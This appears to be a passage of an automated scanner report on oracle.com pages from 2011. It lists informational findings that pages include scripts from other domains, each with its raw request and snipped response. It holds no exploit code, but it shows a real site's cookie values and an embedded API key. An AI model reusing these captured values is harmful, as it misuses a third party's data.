User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.GetCourseDesc?page_id=1&dc=D70302_1353145&p_preview=N; p_org_id=1001; p_lang=US; gpv_p24=no%20value; s_cc=true; s_wgw_lv=1315342614699; s_wgw_lv_s=First%20Visit; s_nr6=1315342614700-New; s_nr=1315342614766; gpw_e24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Findex.html; s_sq=winweboracle%3D%2526pid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Findex.html%2526oid%253Dhttp%25253A%252F%252Fwww.oracle.com%252Fopenworld%252Ftools%252Fmobile%252Findex.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35932300261399681,0:1)
Content-Length: 41094
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:56:55 GMT
Connection: close

<!DOCTYPE html>

<html id="top">
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undefined";
var g_HttpRelativeWebRoot =
...[SNIP]...
</script>
<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Activenetwork SiteCatalyst calls -->
<script type="text/javascript" src="https://oracleus.wingateweb.com/portal/analytics/s_code.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_openworld2011.js"></script>
...[SNIP]...

20.158. http://www.oracle.com/partners/admin/web_account.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/admin/web_account.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/admin/web_account.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (M;max-age=300+0;age=0;ecid=35730453979073041,0:1)
Date: Tue, 06 Sep 2011 16:08:34 GMT
Content-Length: 26901
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.159. http://www.oracle.com/partners/en/how-to-do-business/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/how-to-do-business/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/how-to-do-business/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41070803430018397,0:1)
Date: Tue, 06 Sep 2011 16:08:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48925

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.160. http://www.oracle.com/partners/en/join-now/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/join-now/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/join-now/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=101;ecid=41070885034398193,0:1)
Date: Tue, 06 Sep 2011 16:08:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.161. http://www.oracle.com/partners/en/knowledge-zone/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/knowledge-zone/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/knowledge-zone/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=41070906509234942,0:1)
Date: Tue, 06 Sep 2011 16:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 92582

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.162. http://www.oracle.com/partners/en/most-popular-resources/enablement-028916.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/most-popular-resources/enablement-028916.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/most-popular-resources/enablement-028916.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41070983818647173,0:1)
Date: Tue, 06 Sep 2011 16:08:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67526

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.163. http://www.oracle.com/partners/en/opn-program/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/opn-program/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=282;ecid=35731201303394792,0:1)
Date: Tue, 06 Sep 2011 16:08:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48962

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.164. http://www.oracle.com/partners/en/opn-program/membership-resources/business-center/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/membership-resources/business-center/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/opn-program/membership-resources/business-center/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41071516394601635,0:1)
Date: Tue, 06 Sep 2011 16:08:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 249980

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.165. http://www.oracle.com/partners/en/opn-program/membership-resources/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/membership-resources/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/opn-program/membership-resources/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41153494435382476,0:1)
Date: Tue, 06 Sep 2011 16:08:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46358

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ocom/groups/public/@opnpublic/documents/webcontent/430048.css" />
   <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
   <script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.166. http://www.oracle.com/partners/en/opn-program/opn-details-by-levels/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/opn-details-by-levels/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/opn-program/opn-details-by-levels/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41071722553034640,0:1)
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 52841

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.167. http://www.oracle.com/partners/en/opn-program/specialize/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/en/opn-program/specialize/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/en/opn-program/specialize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=0;ecid=41153606104533675,0:1)
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63014

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/ocom/groups/public/@opnpublic/documents/webcontent/430048.css" />
   <script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
   <script src="http://admin.brightcove.com/js/APIModules_all.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/addthis_widget.php?v=12" ></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.168. http://www.oracle.com/partners/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=260;ecid=35980846277479921,0:1)
Date: Tue, 06 Sep 2011 16:08:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 76516

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<td width="83%" valign="top"><script type="text/javascript" src="http://www.google.com/jsapi?key=ABQIAAAAOnnhxc5WHl2B1gcBENsogxToKgSLRNLB74Ju4XnQeN6j9STtfRRbGjgKWOot575DxC4ZOzBhwgg-OA"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/us/assets/metrics/ora_opn.js"></script>
...[SNIP]...

20.169. http://www.oracle.com/partners/secure/development/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/development/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/development/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41071864286957439,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.170. http://www.oracle.com/partners/secure/development/order-technology-software/access-software-and-support-020672.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/development/order-technology-software/access-software-and-support-020672.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/development/order-technology-software/access-software-and-support-020672.htm HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35731630800130588,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.171. http://www.oracle.com/partners/secure/development/order-technology-software/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/development/order-technology-software/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/development/order-technology-software/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41153782198195405,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:53 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.172. http://www.oracle.com/partners/secure/marketing/download-logos/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/marketing/download-logos/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/marketing/download-logos/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41153838032771023,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.173. http://www.oracle.com/partners/secure/marketing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/marketing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/marketing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=41072053265521103,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.174. http://www.oracle.com/partners/secure/marketing/marketing-and-event-kits/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/marketing/marketing-and-event-kits/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/marketing/marketing-and-event-kits/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Location: https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.4~7765A556~...[SNIP]...
WWW-Authenticate: Basic realm="Idc Security /ocom/idcplg"
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (N;ecid=35731828368628804,0:1)
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 24411

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><script type="text/javascript">
var _U = "undef
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!--Brightcove script line and lightbox code-->
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<!-- Start SiteCatalyst code -->
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/public/@opnpublic/documents/systemobject/s_code_opn.js"></script>
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

20.175. http://www.oracle.com/partners/secure/membership/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /partners/secure/membership/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /partners/secure/membership/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
